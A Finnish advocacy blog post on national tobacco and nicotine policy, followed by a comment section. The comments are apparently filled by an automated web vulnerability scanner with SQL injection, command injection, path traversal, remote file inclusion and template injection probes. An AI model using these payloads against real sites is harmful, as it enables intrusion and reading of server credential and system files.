fi | sv | eng

Menestystarina hallitusohjelmien osaksi

21.06.2018, 09:12

Muistatko vielä, kun lentokoneissa sai tupakoida? Kun lentokone jaettiin näennäisesti tupakoivien ja tupakoimattomien penkkiriveihin? Haju tarttui joka tapauksessa vaatteisiin ja hiuksiin. 

Vaikka terveys- ja hajuhaitoista valitettiin ja puhuttiin, ajatus savuttomasta tulevaisuudesta tuli vain erittäin harvojen mieleen.  Nyt vuonna 2018 ajatus on lähes kaikkien hyväksymä ja kyse on vain siitä, millä tavoin tavoitteeseen päästään. Sosiaalinen muutos on ollut valtava.

Sosiaali- ja terveysministeriön asettama työryhmä tupakka- ja nikotiinipolitiikan kehittämiseksi julkisti mietintönsä toukokuun lopussa.  Asiantuntijatyöryhmässä punnittiin monia erilaisia vaihtoehtoja ja kuultiin laajasti eri tahoja. Mietittiin, mitkä asiat vaatisivat nyt kipeimmin ja nopeammin korjaamista. Todettiin, että tupakoinnin lopettamisen tukeen tarvitaan entistä enemmän panostusta. Tässä terveydenhuolto ja terveydenhuollon ammattilaiset ovat avainasemassa.

Suomessa raskaana olevien tupakointi on huomattavan korkealla tasolla esimerkiksi muihin Pohjoismaihin verrattuna. Tupakointi on hyvin yleistä myös mielenterveyskuntoutujien ja monien muiden erityisryhmien keskuudessa. Myös heillä on oikeus saada osaavaa tukea ja kannustusta tupakoinnin lopettamiseen.

Terveydenhuollon henkilöstön rooli ei kuitenkaan ole ainoastaan ammatillisessa osaamisessa ja mahdollisuudessa rohkaista tupakka- ja nikotiinituotteiden käytön lopettamiseen, vaan myös mielipidevaikuttamisessa. Heitä kuunnellaan. Heidän panostaan tarvitaan tulevaisuudessakin.

Kaikkiaan työryhmällämme on 44 tupakkapoliittista toimenpide-ehdotusta. Tupakoinnin lopettamisen tuen ohella ehdotuksia on muun muassa muutoksia lainsäädäntöön ja verotukseen, ikärajojen nostamista, laajennettuja tupakointikieltoja, matkustajatuonnin rajoituksia sekä tupakka- ja nikotiinituotteiden käytön seurantaa.

Yksi asia nousi kuitenkin kaiken edelle: esitetyt toimenpiteet ovat vain yksi askel matkalla savuttomaan ja nikotiinittomaan Suomeen. Työryhmässä vallitsi laaja yksimielisyys siitä, että tavoitteen saavuttaminen edellyttää muutaman vuoden välein toteutettavia lisätoimia. Jokaisella hallituskaudella vuoteen 2030 saakka tulee selvittää ja arvioida tavoitteen toteutumista ja esittää tarvittavia lisätoimia. Uusien ehdotusten toteuttaminen tulee ottaa aina hallitusohjelmiin.

Tupakointi on väestömme suurin yksittäinen terveysriski ja ennenaikaisen kuolleisuuden aiheuttaja

Savuttomuuden ja nikotiinittomuuden edistämisen taustalla on väestön terveys, työkyky ja hyvinvointi. Tupakointi on väestömme suurin yksittäinen terveysriski ja ennenaikaisen kuolleisuuden aiheuttaja. Tupakoitsijat kuolevat keskimäärin 10 vuotta tupakoimattomia nuorempina, ja noin 10 prosenttia kaikista kuolemista johtuu tupakoinnista.

Merkittävimmät tupakoinnin aiheuttamat sairaudet ovat syöpä-, hengityselin- ja verenkiertoelimistön sairaudet. Tupakointi heikentää  myös monien sairauksien hoitojen tehoa, lisää hoitoihin tai toimenpiteisiin, kuten leikkauksiin, liittyvien komplikaatioiden riskiä ja hidastaa mm. haavojen ja murtumien paranemista. Kyse ei siis ole mistään pienestä jutusta.

Suomi on ollut tupakkapolitiikan edelläkävijämaita jo vuodesta 1970-luvulta lähtien, jolloin säädettiin tupakkalaki.  Siitä lähtien tupakkalainsäädäntöä on kehitetty johdonmukaisesti tupakkateollisuuden kiivaasta vastustuksesta huolimatta. Suuret tupakkapoliittiset lainsäädäntötoimet, kuten mm. tupakkatuotteiden markkinointikiellot sekä työpaikkojen ja ravintoloiden savuttomuus ovat toteuduttuaan saaneet väestön enemmistön kannatuksen. Toteutetuilla toimenpiteillä on saatu tupakointia vähenemään ja samalla sen sosiaalinen hyväksyttävyys on vähentynyt.  Tupakointi ei ole enää trendikästä.

Toisaalta tupakkayritykset pyrkivät kynsin hampain pitämään kiinni voitoistaan ja kehittämään uusia erityisesti nuoria houkuttelevia nikotiinituotteita ja vähättelemään niidenkin käytöstä aiheutuvia terveysvaaroja.  Uudet nikotiinituotteet ovat vain uusia nikotiinin annostelutapoja, mutta ovat nikotiinin aiheuttaman voimakkaan riippuvuuden vuoksi elintärkeitä uskollisten asiakkaiden rekrytoinnissa.  Siitä huolimatta tupakointia on mahdollista vähentää korvaamatta savukkeiden polttoa muilla nikotiinituotteilla. Tästä Suomen saavutukset ovat hyvänä esimerkkinä.

Suomalainen tupakkapolitiikka on vertaansa vailla oleva menestystarina, johon meillä kaikilla on yhä mahdollisuus vaikuttaa. Entisten hyväksi havaittujen keinojen käyttöä tulee jatkaa ja tehostaa, mutta myös kehitettävä uusia tapoja monella rintamalla. Yksi keino ei riitä vaan tarvitaan toimenpidekokonaisuus, jonka eri osaset tukevat toisiaan. Tavoitteen saavuttaminen edellyttää koko yhteiskunnan vankkaa sitoutumista.

Mervi Hara
toiminnanjohtaja, Suomen ASH ry

Kommentointi

Otsikko:
Nimi:
Kommentti:
 

e

Nimi: e

1

29.07.2018, 09:08

e

Nimi: e

'+response.write(9576348*9216471)+'

29.07.2018, 09:12

e

Nimi: '+response.write(9486124*9587160)+'

1

29.07.2018, 09:12

e

Nimi: e

"+response.write(9576348*9216471)+"

29.07.2018, 09:12

e

Nimi: e

response.write(9576348*9216471)

29.07.2018, 09:12

e

Nimi: "+response.write(9486124*9587160)+"

1

29.07.2018, 09:12

e

Nimi: response.write(9486124*9587160)

1

29.07.2018, 09:12

'+response.write(9933945*9490456)+'

Nimi: e

1

29.07.2018, 09:12

response.write(9933945*9490456)

Nimi: e

1

29.07.2018, 09:12

"+response.write(9933945*9490456)+"

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

$(nslookup qfubbFvu)

29.07.2018, 09:12

e

Nimi: e

set|set&set

29.07.2018, 09:12

e

Nimi: e

-1 OR 3*2>(0+5+906-906) --

29.07.2018, 09:12

e

Nimi: set|set&set

1

29.07.2018, 09:12

e

Nimi: e

-1 OR 3+906-906-1=0+0+0+1 --

29.07.2018, 09:12

e

Nimi: $(nslookup yBHTMt8w)

1

29.07.2018, 09:12

e

Nimi: &nslookup RnPYDojz&'\"`0&nslookup RnPYDojz&`'

1

29.07.2018, 09:12

e

Nimi: e

-1 OR 3*2<(0+5+906-906) --

29.07.2018, 09:12

e

Nimi: e

-1 OR 2+906-906-1=0+0+0+1 --

29.07.2018, 09:12

e

Nimi: e

&nslookup qewVJMqp&'\"`0&nslookup qewVJMqp&`'

29.07.2018, 09:12

e

Nimi: e

Vrj8EB1l

29.07.2018, 09:12

e

Nimi: O7MI3KPi

1

29.07.2018, 09:12

e

Nimi: e

-1 OR 3*2<(0+5+686-686)

29.07.2018, 09:12

&nslookup q7nq1v69&'\"`0&nslookup q7nq1v69&`'

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

-1 OR 3+686-686-1=0+0+0+1

29.07.2018, 09:12

e

Nimi: e

-1 OR 2+686-686-1=0+0+0+1

29.07.2018, 09:12

$(nslookup 9jI73Bhp)

Nimi: e

1

29.07.2018, 09:12

set|set&set

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

-1 OR 3*2>(0+5+686-686)

29.07.2018, 09:12

e

Nimi: e

../../../../../../../../../../../../../../../proc/version

29.07.2018, 09:12

e

Nimi: e

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

29.07.2018, 09:12

651ImiON

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

-1' OR 2+390-390-1=0+0+0+1 --

29.07.2018, 09:12

e

Nimi: e

-1' OR 3*2>(0+5+390-390) --

29.07.2018, 09:12

e

Nimi: e

-1' OR 3+390-390-1=0+0+0+1 --

29.07.2018, 09:12

e

Nimi: e

../../../../../../../../../../etc/passwd

29.07.2018, 09:12

e

Nimi: e

-1' OR 3*2<(0+5+390-390) --

29.07.2018, 09:12

e

Nimi: e

-1' OR 3*2>(0+5+761-761) or 'YR1m5jtu'='

29.07.2018, 09:12

e

Nimi: e

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

29.07.2018, 09:12

e

Nimi: e

-1' OR 2+761-761-1=0+0+0+1 or 'YR1m5jtu'='

29.07.2018, 09:12

e

Nimi: e

-1' OR 3*2<(0+5+761-761) or 'YR1m5jtu'='

29.07.2018, 09:12

e

Nimi: e

-1' OR 3+761-761-1=0+0+0+1 or 'YR1m5jtu'='

29.07.2018, 09:12

e

Nimi: e

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

29.07.2018, 09:12

e

Nimi: e

/etc/passwd

29.07.2018, 09:12

e

Nimi: e

-1" OR 2+441-441-1=0+0+0+1 --

29.07.2018, 09:12

e

Nimi: e

-1" OR 3*2<(0+5+441-441) --

29.07.2018, 09:12

e

Nimi: e

/.././.././.././.././.././.././.././../etc/./passwd%00

29.07.2018, 09:12

e

Nimi: e

-1" OR 3+441-441-1=0+0+0+1 --

29.07.2018, 09:12

e

Nimi: e

%2fetc%2fpasswd

29.07.2018, 09:12

e

Nimi: e

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

29.07.2018, 09:12

e

Nimi: e

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

29.07.2018, 09:12

e

Nimi: e

-1" OR 3*2>(0+5+441-441) --

29.07.2018, 09:12

e

Nimi: e

-1; waitfor delay '0:0:6' --

29.07.2018, 09:12

e

Nimi: e

file:///etc/passwd

29.07.2018, 09:12

e

Nimi: e

-1); waitfor delay '0:0:9' --

29.07.2018, 09:12

e

Nimi: e

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

29.07.2018, 09:12

e

Nimi: e

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

29.07.2018, 09:12

e

Nimi: e

-1;select pg_sleep(3); --

29.07.2018, 09:12

e

Nimi: e

WEB-INF/web.xml

29.07.2018, 09:12

e

Nimi: e

yFvgXznb'; waitfor delay '0:0:3' --

29.07.2018, 09:12

e

Nimi: e

/\../\../\../\../\../\../\../etc/passwd

29.07.2018, 09:12

e

Nimi: e

1 waitfor delay '0:0:9' --

29.07.2018, 09:12

e

Nimi: e

-1);select pg_sleep(3); --

29.07.2018, 09:12

e

Nimi: e

/WEB-INF/web.xml

29.07.2018, 09:12

e

Nimi: e

sv5Yv5Lx';select pg_sleep(6); --

29.07.2018, 09:12

e

Nimi: e

T3fyUqu7'));select pg_sleep(9); --

29.07.2018, 09:12

e

Nimi: e

WEB-INF\web.xml

29.07.2018, 09:12

e

Nimi: e

../../../../../../../../../../windows/win.ini

29.07.2018, 09:12

e

Nimi: e

oK1LhHTJ');select pg_sleep(6); --

29.07.2018, 09:12

e

Nimi: e

../../../../../../../../../../boot.ini

29.07.2018, 09:12

e

Nimi: e

-1));select pg_sleep(6); --

29.07.2018, 09:12

e

Nimi: e

29.07.2018, 09:12

e

Nimi: e

................windowswin.ini

29.07.2018, 09:12

e

Nimi:

1

29.07.2018, 09:12

e

Nimi: -1 OR 2+333-333-1=0+0+0+1 --

1

29.07.2018, 09:12

e

Nimi: -1 OR 3+333-333-1=0+0+0+1 --

1

29.07.2018, 09:12

e

Nimi: -1 OR 3*2>(0+5+333-333) --

1

29.07.2018, 09:12

e

Nimi: e

..\..\..\..\..\..\..\..\windows\win.ini

29.07.2018, 09:12

e

Nimi: e

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

29.07.2018, 09:12

e

Nimi: e

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

29.07.2018, 09:12

e

Nimi: -1 OR 3*2

1

29.07.2018, 09:12

(Ei otsikkoa)

Nimi: e

1

29.07.2018, 09:12

e

Nimi: -1 OR 3+726-726-1=0+0+0+1

1

29.07.2018, 09:12

e

Nimi: e

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

29.07.2018, 09:12

e

Nimi: -1 OR 2+726-726-1=0+0+0+1

1

29.07.2018, 09:12

e

Nimi: e

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

29.07.2018, 09:12

Nimi: e

1

29.07.2018, 09:12

e

Nimi: e

${9999964+9999068}

29.07.2018, 09:12

e

Nimi: -1' OR 2+506-506-1=0+0+0+1 --

1

29.07.2018, 09:12

e

Nimi: -1' OR 3+506-506-1=0+0+0+1 --

1

29.07.2018, 09:12

e

Nimi: -1 OR 3*2>(0+5+726-726)

1

29.07.2018, 09:12

e

Nimi: ../../../../../../../../../../etc/passwd

1

29.07.2018, 09:12

${9999714+9999132}

Nimi: e

1

29.07.2018, 09:12

e

Nimi: -1' OR 3*2>(0+5+506-506) --

1

29.07.2018, 09:12

e

Nimi: ${9999459+10000167}

1

29.07.2018, 09:12

e

Nimi: e

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

29.07.2018, 09:12

e

Nimi: ../../../../../../../../../../../../../../../proc/version

1

29.07.2018, 09:12

e

Nimi: ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

29.07.2018, 09:12

e

Nimi: ../../../../../../../../../../etc/passwd.jpg

1

29.07.2018, 09:12

e

Nimi: -1' OR 3*2

1

29.07.2018, 09:12

e

Nimi: -1' OR 3+177-177-1=0+0+0+1 or 'frQwqO7D'='

1

29.07.2018, 09:12

e

Nimi: e

Http://testasp.vulnweb.com/t/fit.txt

29.07.2018, 09:12

e

Nimi: e

1&n978253=v959648

29.07.2018, 09:12

e

Nimi: /../..//../..//../..//../..//../..//etc/passwd.jpg

1

29.07.2018, 09:12

e

Nimi: e

testasp.vulnweb.com

29.07.2018, 09:12

e

Nimi: e

http://testasp.vulnweb.com/t/fit.txt?.jpg

29.07.2018, 09:12

e

Nimi: e&n939906=v922277

1

29.07.2018, 09:12

e

Nimi: -1' OR 2+177-177-1=0+0+0+1 or 'frQwqO7D'='

1

29.07.2018, 09:12

e

Nimi: e

!(()&&!|*|*|

29.07.2018, 09:12

e

Nimi: /etc/passwd

1

29.07.2018, 09:12

e

Nimi: .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

29.07.2018, 09:12

e

Nimi: e

^(#$!@#$)(()))******

29.07.2018, 09:12

e

Nimi: http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

1

29.07.2018, 09:12

e

Nimi: 1some_inexistent_file_with_long_name.jpg

1

29.07.2018, 09:12

e

Nimi: Http://testasp.vulnweb.com/t/fit.txt

1

29.07.2018, 09:12

e&n933137=v966168

Nimi: e

1

29.07.2018, 09:12

e

Nimi: -1' OR 3*2>(0+5+177-177) or 'frQwqO7D'='

1

29.07.2018, 09:12

e

Nimi: e

)

29.07.2018, 09:12

e

Nimi: %2fetc%2fpasswd

1

29.07.2018, 09:12

e

Nimi: )

1

29.07.2018, 09:12

e

Nimi: ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

29.07.2018, 09:12

e

Nimi: http://testasp.vulnweb.com/t/fit.txt?.jpg

1

29.07.2018, 09:12

e

Nimi: /.././.././.././.././.././.././.././../etc/./passwd%00

1

29.07.2018, 09:12

e

Nimi: -1" OR 3+561-561-1=0+0+0+1 --

1

29.07.2018, 09:12

e

Nimi: !(()&&!|*|*|

1

29.07.2018, 09:12

e

Nimi: ^(#$!@#$)(()))******

1

29.07.2018, 09:12

e

Nimi: -1" OR 2+561-561-1=0+0+0+1 --

1

29.07.2018, 09:12

e

Nimi: testasp.vulnweb.com

1

29.07.2018, 09:12

e

Nimi: -1" OR 3*2>(0+5+561-561) --

1

29.07.2018, 09:12

e

Nimi: -1" OR 3*2

1

29.07.2018, 09:12

e

Nimi: ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

29.07.2018, 09:12

e

Nimi: invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1

29.07.2018, 09:12

1some_inexistent_file_with_long_name.jpg

Nimi: e

1

29.07.2018, 09:12

^(#$!@#$)(()))******

Nimi: e

1

29.07.2018, 09:12

e

Nimi: 1 waitfor delay '0:0:3' --

1

29.07.2018, 09:12

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

Nimi: e

1

29.07.2018, 09:12

e

Nimi: file:///etc/passwd

1

29.07.2018, 09:12

!(()&&!|*|*|

Nimi: e

1

29.07.2018, 09:12

e

Nimi: (select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

29.07.2018, 09:12

)

Nimi: e

1

29.07.2018, 09:12

e

Nimi: if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

29.07.2018, 09:12

e

Nimi: /\../\../\../\../\../\../\../etc/passwd

1

29.07.2018, 09:12

e

Nimi: e

'"()

29.07.2018, 09:12

e

Nimi: e

29.07.2018, 09:12

http://testasp.vulnweb.com/t/fit.txt?.jpg

Nimi: e

1

29.07.2018, 09:12

e

Nimi: M3r6TSDV'; waitfor delay '0:0:3' --

1

29.07.2018, 09:12

Http://testasp.vulnweb.com/t/fit.txt

Nimi: e

1

29.07.2018, 09:12

testasp.vulnweb.com

Nimi: e

1

29.07.2018, 09:12

e

Nimi: FBOgwCBM';select pg_sleep(3); --

1

29.07.2018, 09:12

e

Nimi: FlEEoSw8');select pg_sleep(3); --

1

29.07.2018, 09:12

e

Nimi: /WEB-INF/web.xml

1

29.07.2018, 09:12

e

Nimi: ECPIOhHC'));select pg_sleep(6); --

1

